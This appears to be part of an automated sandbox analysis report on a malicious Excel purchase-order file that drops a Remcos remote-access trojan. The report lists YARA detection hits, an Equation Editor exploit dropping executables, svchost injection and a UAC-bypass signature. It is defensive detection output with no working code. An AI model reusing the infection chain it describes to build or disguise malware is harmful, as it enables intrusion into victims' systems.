Source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96632497.doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat[1].doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Binary is likely a compiled AutoIt script file
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: This is a third-party compiled AutoIt script. 10_2_001B3B4C
Source: taskhostw.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: taskhostw.exe, 0000000A.00000000.449366301.0000000000264000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_5b2b7944-a
Source: taskhostw.exe, 0000000A.00000000.449366301.0000000000264000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_6a25fbd7-c
Source: taskhostw.exe, 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_eebce20b-8
Source: taskhostw.exe, 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_2f9914ac-8
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: This is a third-party compiled AutoIt script. 11_2_01263B4C
Source: name.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: name.exe, 0000000B.00000000.453360398.0000000001314000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_75c37f58-d
Source: name.exe, 0000000B.00000000.453360398.0000000001314000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_59c41405-a
Source: name.exe, 00000011.00000002.486104935.0000000001314000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_5afa77ec-9
Source: name.exe, 00000011.00000002.486104935.0000000001314000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_d36cde13-4
Source: name.exe.10.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_989c10cc-0
Source: name.exe.10.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_636673e6-7
Source: taskhostw.exe.9.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_c863ee33-e
Source: taskhostw.exe.9.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_e887e63c-4
Source: taskhostw[1].exe.9.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_dcf847ce-b
Source: taskhostw[1].exe.9.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_044667a8-4
Excel sheet contains many unusual embedded objects
Source: PO-00006799868.xls OLE: Microsoft Excel 2007+
Source: PO-00006799868.xls OLE: Microsoft Excel 2007+
Source: 68730000.0.dr OLE: Microsoft Excel 2007+
Source: 68730000.0.dr OLE: Microsoft Excel 2007+
Microsoft Office drops suspicious files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\7al0eY.url Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\shuvi.io.url Jump to behavior
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\taskhostw.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\taskhostw[1].exe Jump to dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 770B0000 page execute and read and write
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0021A279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 10_2_0021A279
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_00208638 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 10_2_00208638
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012C5264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 11_2_012C5264
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A86336 10_3_02A86336
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A7C0A1 10_3_02A7C0A1
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A50687 10_3_02A50687
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A72707 10_3_02A72707
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A7E759 10_3_02A7E759
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A664FE 10_3_02A664FE
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A62590 10_3_02A62590
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A64A80 10_3_02A64A80
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A70A04 10_3_02A70A04
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A7CEF5 10_3_02A7CEF5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A70EF8 10_3_02A70EF8
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A64CC0 10_3_02A64CC0
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A76C13 10_3_02A76C13
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02AD720D 10_3_02AD720D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A5F240 10_3_02A5F240
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A7B326 10_3_02A7B326
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A71310 10_3_02A71310
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A89035 10_3_02A89035
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A71745 10_3_02A71745
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A5D460 10_3_02A5D460
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A63540 10_3_02A63540
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A71B7A 10_3_02A71B7A
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02ACF865 10_3_02ACF865
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A85852 10_3_02A85852
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A819AE 10_3_02A819AE
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02ACFCE2 10_3_02ACFCE2
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A5DC00 10_3_02A5DC00
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A65C41 10_3_02A65C41
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A85DC4 10_3_02A85DC4
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02AADD28 10_3_02AADD28
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02AB7D32 10_3_02AB7D32
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_3_02A87D0F 10_3_02A87D0F
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001BE800 10_2_001BE800
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001D3307 10_2_001D3307
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001DDAF5 10_2_001DDAF5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001BFE40 10_2_001BFE40
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001BE060 10_2_001BE060
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001C4140 10_2_001C4140
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001D2345 10_2_001D2345
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_00230465 10_2_00230465
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001E6452 10_2_001E6452
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001E25AE 10_2_001E25AE
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001D277A 10_2_001D277A
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001C6841 10_2_001C6841
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_002308E2 10_2_002308E2
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0020E928 10_2_0020E928
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001E890F 10_2_001E890F
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_00218932 10_2_00218932
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001C8968 10_2_001C8968
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001E69C4 10_2_001E69C4
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001DCCA1 10_2_001DCCA1
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001E6F36 10_2_001E6F36
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0126E800 11_2_0126E800
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01283307 11_2_01283307
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0128DAF5 11_2_0128DAF5
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0126FE40 11_2_0126FE40
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01274140 11_2_01274140
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0126E060 11_2_0126E060
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01282345 11_2_01282345
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012925AE 11_2_012925AE
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012E0465 11_2_012E0465
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01296452 11_2_01296452
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0128277A 11_2_0128277A
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012BE928 11_2_012BE928
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012C8932 11_2_012C8932
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0129890F 11_2_0129890F
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01278968 11_2_01278968
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012969C4 11_2_012969C4
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01276841 11_2_01276841
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012E08E2 11_2_012E08E2
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0128CCA1 11_2_0128CCA1
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01296F36 11_2_01296F36
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01273190 11_2_01273190
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012770FE 11_2_012770FE
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0128F359 11_2_0128F359
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01261287 11_2_01261287
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01281604 11_2_01281604
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01275680 11_2_01275680
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01287813 11_2_01287813
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012758C0 11_2_012758C0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01281AF8 11_2_01281AF8
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01299C35 11_2_01299C35
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0128BF26 11_2_0128BF26
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01281F10 11_2_01281F10
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012E7E0D 11_2_012E7E0D
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_000B3620 11_2_000B3620
Document contains embedded VBA macros
Source: PO-00006799868.xls OLE indicator, VBA macros: true
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~WRF{8ACACCBE-F49B-438C-81AF-59EF5D64236E}.tmp.4.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: String function: 01280C63 appears 70 times
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: String function: 01288A80 appears 42 times
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: String function: 01267F41 appears 35 times
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: String function: 02A77E80 appears 42 times
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: String function: 02A58E20 appears 32 times
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: String function: 02A58FF8 appears 32 times
Yara signature match
Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
